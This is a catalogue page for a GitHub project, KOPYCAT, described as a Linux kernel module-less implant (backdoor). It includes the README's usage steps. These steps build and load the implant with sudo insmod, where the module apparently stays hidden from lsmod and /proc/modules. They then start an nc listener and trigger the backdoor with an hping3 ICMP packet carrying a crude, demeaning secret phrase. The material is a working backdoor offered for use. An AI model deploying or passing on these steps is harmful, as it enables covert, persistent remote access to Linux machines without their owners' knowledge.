Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/milabs/kopycat

Linux Kernel module-less implant (backdoor)
https://github.com/milabs/kopycat

Last synced: about 2 months ago
JSON representation

Linux Kernel module-less implant (backdoor)

Awesome Lists containing this project

README

        

# 0

KOPYCAT - Linux Kernel module-less implant (backdoor)

# Usage

~~~
$ make
$ sudo insmod kopycat.ko
insmod: ERROR: could not insert module kopycat.ko: Inappropriate ioctl for device
$ lsmod | grep kopycat
$ cat /proc/modules | grep kopycat
~~~

Launch `nc` listener:
~~~
$ nc -l 6666
~~~

Trigger the backdoor by sending ICMP packet with secret phrase:
~~~
$ sudo hping3 -c 1 -j -1 -e black-wives-are-fatter 127.0.0.1
~~~

# Author

[Ilya V. Matveychikov](https://github.com/milabs)

2021